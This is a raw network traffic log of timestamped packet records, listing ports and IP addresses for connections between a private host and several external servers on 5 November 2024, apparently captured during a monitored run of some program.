Nov 5, 2024 11:04:47.945456028 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.947191954 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.947210073 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.947261095 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.947272062 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.947307110 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.947324991 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.947973013 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.947989941 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.948036909 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.948045015 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.948065996 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.948091984 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.099463940 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.099490881 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.099577904 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.099600077 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.099627018 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.099639893 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.100644112 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.100665092 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.100733042 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.100745916 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.100763083 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.100776911 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.101978064 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.102014065 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.102061033 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.102072001 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.102086067 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.102114916 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.102677107 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.102694035 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.102741003 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.102777958 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.102785110 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.102977991 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.104605913 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.104629993 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.104691982 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.104701996 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.104744911 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.257179976 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.257208109 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.257261992 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.257292032 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.257308006 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.257334948 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.258183002 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.258208990 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.258269072 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.258280993 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.258306980 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.258313894 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.259016991 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.259032965 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.259088039 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.259097099 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.259120941 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.259139061 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.260617018 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.260632992 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.260687113 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.260705948 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.260755062 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.261574030 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.261595964 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.261632919 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.261651039 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.261672020 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.261689901 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.262456894 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.262474060 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.262567043 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.262588024 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.262700081 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.415122032 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.415146112 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.415277004 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.415311098 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.416078091 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.416098118 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.416177988 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.416188002 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.416255951 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:48.416301966 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:48.529994965 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:49.929452896 CET	49700	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:49.934387922 CET	80	49700	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:49.934462070 CET	49700	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:49.934726000 CET	49700	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:49.939537048 CET	80	49700	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:50.810302019 CET	80	49700	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:50.818316936 CET	49700	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:50.823323965 CET	80	49700	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:51.081300974 CET	80	49700	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:51.122024059 CET	49700	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:51.369827986 CET	49701	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:51.369893074 CET	443	49701	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:51.369960070 CET	49701	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:51.374660015 CET	49701	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:51.374672890 CET	443	49701	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:51.994167089 CET	443	49701	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:51.994246960 CET	49701	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:51.999336004 CET	49701	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:51.999346972 CET	443	49701	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:51.999696970 CET	443	49701	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:52.043773890 CET	49701	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:52.053781986 CET	49701	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:52.099334002 CET	443	49701	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:52.192722082 CET	443	49701	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:52.192811966 CET	443	49701	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:52.193058968 CET	49701	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:52.198239088 CET	49701	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:52.201838970 CET	49700	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:52.206820011 CET	80	49700	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:52.462960958 CET	80	49700	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:52.465178013 CET	49702	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:52.465230942 CET	443	49702	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:52.465301037 CET	49702	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:52.465760946 CET	49702	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:52.465775967 CET	443	49702	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:52.512547970 CET	49700	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:53.077727079 CET	443	49702	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:53.083157063 CET	49702	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:53.083189964 CET	443	49702	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:53.218688011 CET	443	49702	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:53.218812943 CET	443	49702	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:53.218864918 CET	49702	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:53.219297886 CET	49702	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:53.222457886 CET	49700	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:53.223530054 CET	49703	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:53.227792978 CET	80	49700	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:53.227861881 CET	49700	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:53.228406906 CET	80	49703	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:53.228471994 CET	49703	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:53.228600025 CET	49703	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:53.233444929 CET	80	49703	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:54.109234095 CET	80	49703	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:54.110521078 CET	49704	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:54.110572100 CET	443	49704	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:54.110678911 CET	49704	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:54.110935926 CET	49704	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:54.110953093 CET	443	49704	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:54.153228998 CET	49703	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:54.715605974 CET	443	49704	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:54.717523098 CET	49704	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:54.717554092 CET	443	49704	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:54.862193108 CET	443	49704	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:54.862301111 CET	443	49704	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:54.862355947 CET	49704	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:54.862807989 CET	49704	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:54.867671013 CET	49706	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:54.872576952 CET	80	49706	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:54.872648001 CET	49706	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:54.872726917 CET	49706	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:54.877557039 CET	80	49706	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:55.743571997 CET	80	49706	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:55.758142948 CET	49707	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:55.758198023 CET	443	49707	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:55.758266926 CET	49707	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:55.758544922 CET	49707	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:55.758555889 CET	443	49707	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:55.801354885 CET	49706	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:56.370728016 CET	443	49707	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:56.372391939 CET	49707	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:56.372419119 CET	443	49707	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:56.512387991 CET	443	49707	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:56.512501001 CET	443	49707	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:56.512578011 CET	49707	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:56.513247013 CET	49707	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:56.517165899 CET	49706	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:56.518280029 CET	49708	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:56.522485971 CET	80	49706	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:56.522547960 CET	49706	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:56.523135900 CET	80	49708	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:56.523210049 CET	49708	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:56.523338079 CET	49708	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:56.529102087 CET	80	49708	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:57.400939941 CET	80	49708	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:57.402277946 CET	49714	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:57.402354956 CET	443	49714	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:57.402626991 CET	49714	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:57.402874947 CET	49714	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:57.402889013 CET	443	49714	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:57.450072050 CET	49708	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:58.008222103 CET	443	49714	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:58.010108948 CET	49714	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:58.010149956 CET	443	49714	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:58.150409937 CET	443	49714	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:58.150509119 CET	443	49714	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:58.150593996 CET	49714	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:58.151101112 CET	49714	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:58.155848980 CET	49708	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:58.156434059 CET	49720	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:58.161169052 CET	80	49708	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:58.161277056 CET	80	49720	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:58.161350012 CET	49708	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:58.161447048 CET	49720	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:58.161645889 CET	49720	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:58.166421890 CET	80	49720	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:59.029938936 CET	80	49720	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:59.031220913 CET	49726	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:59.031276941 CET	443	49726	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:59.031354904 CET	49726	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:59.031598091 CET	49726	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:59.031613111 CET	443	49726	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:59.075186968 CET	49720	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:59.635502100 CET	443	49726	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:59.637243032 CET	49726	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:59.637269974 CET	443	49726	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:59.778889894 CET	443	49726	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:59.778986931 CET	443	49726	188.114.96.3	192.168.2.7
Nov 5, 2024 11:04:59.779040098 CET	49726	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:59.779560089 CET	49726	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:04:59.783226967 CET	49720	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:59.784478903 CET	49732	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:59.788661003 CET	80	49720	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:59.788722038 CET	49720	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:59.789391994 CET	80	49732	132.226.247.73	192.168.2.7
Nov 5, 2024 11:04:59.789458036 CET	49732	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:59.789591074 CET	49732	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:04:59.794379950 CET	80	49732	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:00.698910952 CET	80	49732	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:00.700282097 CET	49739	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:00.700319052 CET	443	49739	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:00.700377941 CET	49739	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:00.700679064 CET	49739	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:00.700695992 CET	443	49739	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:00.747095108 CET	49732	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:01.308289051 CET	443	49739	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:01.310034037 CET	49739	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:01.310061932 CET	443	49739	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:01.451251984 CET	443	49739	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:01.451374054 CET	443	49739	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:01.451474905 CET	49739	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:01.451893091 CET	49739	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:01.455231905 CET	49732	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:01.456258059 CET	49746	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:01.693640947 CET	80	49746	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:01.693675041 CET	80	49732	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:01.693721056 CET	49746	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:01.693758011 CET	49732	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:01.694130898 CET	49746	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:01.698899984 CET	80	49746	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:02.821860075 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:02.821897030 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:02.821964025 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:02.828707933 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:02.828736067 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:03.746540070 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:03.746659040 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:03.851249933 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:03.851269007 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:03.851619959 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:03.903225899 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.099178076 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.139331102 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.380508900 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.434482098 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.538587093 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.538600922 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.538640022 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.538662910 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.538676023 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.538680077 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.538703918 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.538768053 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.538768053 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.655647993 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.655666113 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.655709982 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.655771017 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.655822992 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.656176090 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.656176090 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.773878098 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.773900986 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.773993015 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.774013996 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.774069071 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.774069071 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.929770947 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.929790974 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.929883003 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.929917097 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:04.929940939 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:04.929958105 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.010492086 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.010514975 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.010588884 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.010603905 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.010786057 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.163578987 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.163606882 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.163667917 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.163681030 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.163742065 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.280265093 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.280301094 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.280354977 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.280365944 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.280380964 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.280428886 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.357559919 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.357597113 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.357673883 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.357688904 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.357702971 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.357781887 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.401345968 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.401371956 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.401463985 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.401463985 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.401480913 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.401552916 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.516911030 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.516937971 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.517051935 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.517051935 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.517065048 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.517179012 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.632097006 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.632129908 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.632186890 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.632205009 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.632280111 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.708391905 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.708425045 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.708492994 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.708502054 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.708532095 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.708585024 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.753073931 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.753101110 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.753173113 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.753180981 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.753206968 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.753233910 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.868818045 CET	443	49755	188.132.193.46	192.168.2.7
